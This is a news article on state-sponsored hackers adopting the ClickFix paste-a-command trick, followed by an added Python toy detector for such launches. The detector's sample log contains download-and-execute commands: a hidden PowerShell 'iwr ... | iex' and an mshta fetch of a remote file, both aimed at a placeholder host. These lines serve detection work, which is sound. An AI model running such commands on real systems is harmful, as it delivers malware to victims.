- Proofpoint reports that several state-sponsored groups have been seen using the ClickFix attack technique
- Russian, North Korean and Iranian actors are all involved
- The state-sponsored actors are mainly engaged in cyber-espionage
The ClickFix attack technique has become so popular that even state-sponsored threat actors are using it, Proofpoint research claims, having observed at least three groups taking advantage of the method in the last quarter of 2024.
In a detailed report, Proofpoint said it saw Kimsuky, MuddyWater, UNK_REMOTEROGUE and APT28 all using ClickFix in their attack chains.
Kimsuky is a known North Korean threat actor, MuddyWater is Iranian, while UNK_REMOTEROGUE and APT28 are said to be Russian. Aside from North Korea's Lazarus Group, state-sponsored threat actors are mainly engaged in cyber-espionage, stealing sensitive information from diplomats, critical infrastructure organizations, think tanks and similar organizations belonging to their adversaries.
No revolution
“The incorporation of ClickFix does not revolutionize the campaigns carried out by TA427, TA450, UNK_REMOTEROGUE and TA422, but rather replaces the installation and execution steps in the existing infection chains,” Proofpoint explained.
ClickFix has been making headlines for months now. It is a social engineering tactic similar to the old “You've got a virus” pop-ups that websites used two decades ago.
Originally, the pop-up window would invite the visitor to download and run an antivirus program which was, in fact, just malware.
When the industry tackled this attack by taking down the infrastructure, crooks pivoted to leaving a phone number for supposed computer support.
Victims who called this number would be tricked into installing remote desktop programs, giving the crooks the ability to download and run malware on their devices.
The ClickFix attack takes this method and gives it a unique twist. It still starts with a pop-up, but sometimes victims are also asked to “complete a captcha”, “verify their identity” or similar. The process does not force them to click a download button, but instead asks them to copy and paste a command into their Run dialog.
Although it seems far-fetched, it has been very successful, as proven by its adoption by nation states as well.
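Because the final step of ClickFix is the victim pasting a command into the Run dialog, the useful detection signal is a script host spawned directly by the desktop shell with a command line that fetches remote content. The following Python script is an added illustration of that logic, not part of the article or of Proofpoint's report: it assumes Windows (the article names no operating system), assumes `explorer.exe` as the shell parent, and runs over a constructed process-creation log format rather than any real EDR or Sysmon output.

```python
"""Toy detector for the ClickFix pattern described above.

Assumptions (not from the article): Windows, explorer.exe as the desktop
shell, and a constructed one-line-per-event log format:
    parent=<exe> image=<exe> cmdline="<command line>"
"""
import re
from dataclasses import dataclass

# Interpreters a pasted Run-dialog command typically lands in (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}
SHELL_PARENTS = {"explorer.exe"}

# Command-line fragments that pull code from the network.
NETWORK_HINTS = re.compile(
    r"(https?://|invoke-webrequest|\biwr\b|downloadstring|\bcurl\b|bitsadmin)", re.I)
# Flags that hide the window or encode the payload.
OBFUSCATION_HINTS = re.compile(
    r"(-enc\w*\s|-w(indowstyle)?\s+hidden|frombase64string)", re.I)


@dataclass
class ProcEvent:
    parent: str
    image: str
    cmdline: str


def parse_event(line):
    """Parse one constructed log line; return None for lines we don't understand."""
    m = re.match(r'parent=(\S+)\s+image=(\S+)\s+cmdline="(.*)"$', line)
    if not m:
        return None
    return ProcEvent(m.group(1).lower(), m.group(2).lower(), m.group(3))


def score(ev):
    """Return the list of reasons an event looks like a pasted ClickFix command."""
    reasons = []
    if ev.parent in SHELL_PARENTS and ev.image in SCRIPT_HOSTS:
        reasons.append("script host launched directly from the desktop shell")
    if NETWORK_HINTS.search(ev.cmdline):
        reasons.append("command line fetches remote content")
    if OBFUSCATION_HINTS.search(ev.cmdline):
        reasons.append("hidden-window or encoded execution flags")
    return reasons


def flag_events(lines):
    """Flag events with at least two independent indicators to limit false positives."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        reasons = score(ev)
        if len(reasons) >= 2:
            hits.append((ev, reasons))
    return hits


# Constructed sample log: two ClickFix-style launches, two benign events.
SAMPLE_LOG = [
    'parent=explorer.exe image=powershell.exe cmdline="powershell -w hidden -c iwr http://example.invalid/x | iex"',
    'parent=cmd.exe image=powershell.exe cmdline="powershell -File C:\\build\\run.ps1"',
    'parent=explorer.exe image=notepad.exe cmdline="notepad.exe notes.txt"',
    'parent=explorer.exe image=mshta.exe cmdline="mshta https://example.invalid/v.hta"',
]

if __name__ == "__main__":
    for ev, reasons in flag_events(SAMPLE_LOG):
        print(f"ALERT {ev.image} <- {ev.parent}: {'; '.join(reasons)}")
```

Requiring two indicators keeps an administrator's `cmd.exe`-spawned build script and ordinary desktop launches out of the alert list; in a real deployment the parent-process and interpreter sets would come from the telemetry source rather than the assumed values above.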
Via The Hacker News